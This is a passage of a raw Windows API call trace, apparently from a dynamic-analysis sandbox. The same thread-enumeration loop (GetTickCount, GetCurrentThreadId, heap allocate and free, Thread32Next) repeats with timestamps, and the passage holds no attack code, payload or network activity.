returned 0x11f0674 [0096.647] GetCurrentThreadId () returned 0x42c [0096.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.647] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.647] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.648] GetTickCount () returned 0x11f0674 [0096.648] GetCurrentThreadId () returned 0x42c [0096.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.648] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.649] GetTickCount () returned 0x11f0674 [0096.649] GetCurrentThreadId () returned 0x42c [0096.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.649] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.650] GetTickCount () returned 0x11f0684 [0096.650] GetCurrentThreadId () returned 0x42c [0096.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.650] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.651] GetTickCount () returned 0x11f0684 [0096.651] GetCurrentThreadId () returned 0x42c [0096.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.651] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.652] GetTickCount () returned 0x11f0684 [0096.652] GetCurrentThreadId () returned 0x42c [0096.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.652] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.653] GetTickCount () returned 0x11f0684 [0096.653] GetCurrentThreadId () returned 0x42c [0096.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.653] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.654] GetTickCount () returned 0x11f0684 [0096.654] GetCurrentThreadId () returned 0x42c [0096.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.654] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.655] GetTickCount () returned 0x11f0684 [0096.655] GetCurrentThreadId () returned 0x42c [0096.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.656] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.657] GetTickCount () returned 0x11f0684 [0096.657] GetCurrentThreadId () returned 0x42c [0096.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.657] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.658] GetTickCount () returned 0x11f0684 [0096.658] GetCurrentThreadId () returned 0x42c [0096.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.658] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.659] GetTickCount () returned 0x11f0684 [0096.659] GetCurrentThreadId () returned 0x42c [0096.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.659] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.660] GetTickCount () returned 0x11f0684 [0096.660] GetCurrentThreadId () returned 0x42c [0096.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.660] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.661] GetTickCount () returned 0x11f0684 [0096.661] GetCurrentThreadId () returned 0x42c [0096.661] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.661] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.662] GetTickCount () returned 0x11f0684 [0096.662] GetCurrentThreadId () returned 0x42c [0096.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.663] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.663] GetTickCount () returned 0x11f0684 [0096.664] GetCurrentThreadId () returned 0x42c [0096.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.664] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.665] GetTickCount () returned 0x11f0684 [0096.665] GetCurrentThreadId () returned 0x42c [0096.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.665] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.666] GetTickCount () returned 0x11f0693 [0096.666] GetCurrentThreadId () returned 0x42c [0096.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.666] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.667] GetTickCount () returned 0x11f0693 [0096.667] GetCurrentThreadId () returned 0x42c [0096.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.667] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.668] GetTickCount () returned 0x11f0693 [0096.668] GetCurrentThreadId () returned 0x42c [0096.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.668] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.671] GetTickCount () returned 0x11f0693 [0096.671] GetCurrentThreadId () returned 0x42c [0096.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.671] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.672] GetTickCount () returned 0x11f0693 [0096.672] GetCurrentThreadId () returned 0x42c [0096.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.672] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.673] GetTickCount () returned 0x11f0693 [0096.673] GetCurrentThreadId () returned 0x42c [0096.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.673] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.674] GetTickCount () returned 0x11f0693 [0096.674] GetCurrentThreadId () returned 0x42c [0096.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.674] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.675] GetTickCount () returned 0x11f0693 [0096.675] GetCurrentThreadId () returned 0x42c [0096.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.675] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.676] GetTickCount () returned 0x11f0693 [0096.676] GetCurrentThreadId () returned 0x42c [0096.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.676] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.677] GetTickCount () returned 0x11f0693 [0096.677] GetCurrentThreadId () returned 0x42c [0096.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.677] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.678] GetTickCount () returned 0x11f0693 [0096.678] GetCurrentThreadId () returned 0x42c [0096.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.679] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.680] GetTickCount () returned 0x11f0693 [0096.680] GetCurrentThreadId () returned 0x42c [0096.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.680] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.681] GetTickCount () returned 0x11f06a3 [0096.681] GetCurrentThreadId () returned 0x42c [0096.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.681] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.682] GetTickCount () returned 0x11f06a3 [0096.682] GetCurrentThreadId () returned 0x42c [0096.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.683] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.684] GetTickCount () returned 0x11f06a3 [0096.684] GetCurrentThreadId () returned 0x42c [0096.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.684] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.685] GetTickCount () returned 0x11f06a3 [0096.685] GetCurrentThreadId () returned 0x42c [0096.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.685] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.686] GetTickCount () returned 0x11f06a3 [0096.686] GetCurrentThreadId () returned 0x42c [0096.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.686] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.687] GetTickCount () returned 0x11f06a3 [0096.687] GetCurrentThreadId () returned 0x42c [0096.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.687] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.688] GetTickCount () returned 0x11f06a3 [0096.688] GetCurrentThreadId () returned 0x42c [0096.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.688] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.689] GetTickCount () returned 0x11f06a3 [0096.689] GetCurrentThreadId () returned 0x42c [0096.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.689] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.690] GetTickCount () returned 0x11f06a3 [0096.690] GetCurrentThreadId () returned 0x42c [0096.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.690] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.692] GetTickCount () returned 0x11f06a3 [0096.692] GetCurrentThreadId () returned 0x42c [0096.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.692] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.693] GetTickCount () returned 0x11f06a3 [0096.693] GetCurrentThreadId () returned 0x42c [0096.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.693] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.694] GetTickCount () returned 0x11f06a3 [0096.694] GetCurrentThreadId () returned 0x42c [0096.694] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.694] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.695] GetTickCount () returned 0x11f06a3 [0096.695] GetCurrentThreadId () returned 0x42c [0096.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.695] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.696] GetTickCount () returned 0x11f06a3 [0096.696] GetCurrentThreadId () returned 0x42c [0096.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.696] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.697] GetTickCount () returned 0x11f06b2 [0096.697] GetCurrentThreadId () returned 0x42c [0096.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.698] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.699] GetTickCount () returned 0x11f06b2 [0096.699] GetCurrentThreadId () returned 0x42c [0096.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.699] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.700] GetTickCount () returned 0x11f06b2 [0096.700] GetCurrentThreadId () returned 0x42c [0096.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.700] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.701] GetTickCount () returned 0x11f06b2 [0096.701] GetCurrentThreadId () returned 0x42c [0096.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.701] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.702] GetTickCount () returned 0x11f06b2 [0096.702] GetCurrentThreadId () returned 0x42c [0096.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.702] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.703] GetTickCount () returned 0x11f06b2 [0096.703] GetCurrentThreadId () returned 0x42c [0096.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.703] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.704] GetTickCount () returned 0x11f06b2 [0096.704] GetCurrentThreadId () returned 0x42c [0096.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.704] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.705] GetTickCount () returned 0x11f06b2 [0096.705] GetCurrentThreadId () returned 0x42c [0096.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.705] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.706] GetTickCount () returned 0x11f06b2 [0096.706] GetCurrentThreadId () returned 0x42c [0096.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.706] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.707] GetTickCount () returned 0x11f06b2 [0096.707] GetCurrentThreadId () returned 0x42c [0096.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.707] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.708] GetTickCount () returned 0x11f06b2 [0096.708] GetCurrentThreadId () returned 0x42c [0096.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.708] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.709] GetTickCount () returned 0x11f06b2 [0096.709] GetCurrentThreadId () returned 0x42c [0096.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.709] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.710] GetTickCount () returned 0x11f06b2 [0096.710] GetCurrentThreadId () returned 0x42c [0096.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.710] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.711] GetTickCount () returned 0x11f06b2 [0096.711] GetCurrentThreadId () returned 0x42c [0096.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.712] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.712] GetTickCount () returned 0x11f06c2 [0096.712] GetCurrentThreadId () returned 0x42c [0096.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.713] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.713] GetTickCount () returned 0x11f06c2 [0096.713] GetCurrentThreadId () returned 0x42c [0096.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.714] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.714] GetTickCount () returned 0x11f06c2 [0096.714] GetCurrentThreadId () returned 0x42c [0096.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.714] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.715] GetTickCount () returned 0x11f06c2 [0096.715] GetCurrentThreadId () returned 0x42c [0096.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.715] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.716] GetTickCount () returned 0x11f06c2 [0096.716] GetCurrentThreadId () returned 0x42c [0096.716] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.716] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.717] GetTickCount () returned 0x11f06c2 [0096.717] GetCurrentThreadId () returned 0x42c [0096.717] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.717] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.718] GetTickCount () returned 0x11f06c2 [0096.718] GetCurrentThreadId () returned 0x42c [0096.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.718] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.719] GetTickCount () returned 0x11f06c2 [0096.719] GetCurrentThreadId () returned 0x42c [0096.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.719] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.720] GetTickCount () returned 0x11f06c2 [0096.720] GetCurrentThreadId () returned 0x42c [0096.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.720] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.721] GetTickCount () returned 0x11f06c2 [0096.721] GetCurrentThreadId () returned 0x42c [0096.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.721] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.722] GetTickCount () returned 0x11f06c2 [0096.722] GetCurrentThreadId () returned 0x42c [0096.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.722] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.723] GetTickCount () returned 0x11f06c2 [0096.723] GetCurrentThreadId () returned 0x42c [0096.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.723] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.724] GetTickCount () returned 0x11f06c2 [0096.724] GetCurrentThreadId () returned 0x42c [0096.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.724] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.725] GetTickCount () returned 0x11f06c2 [0096.725] GetCurrentThreadId () returned 0x42c [0096.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.725] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.726] GetTickCount () returned 0x11f06c2 [0096.726] GetCurrentThreadId () returned 0x42c [0096.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.726] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.727] GetTickCount () returned 0x11f06c2 [0096.727] GetCurrentThreadId () returned 0x42c [0096.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.727] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.728] GetTickCount () returned 0x11f06d2 [0096.728] GetCurrentThreadId () returned 0x42c [0096.728] RtlAllocateHeap 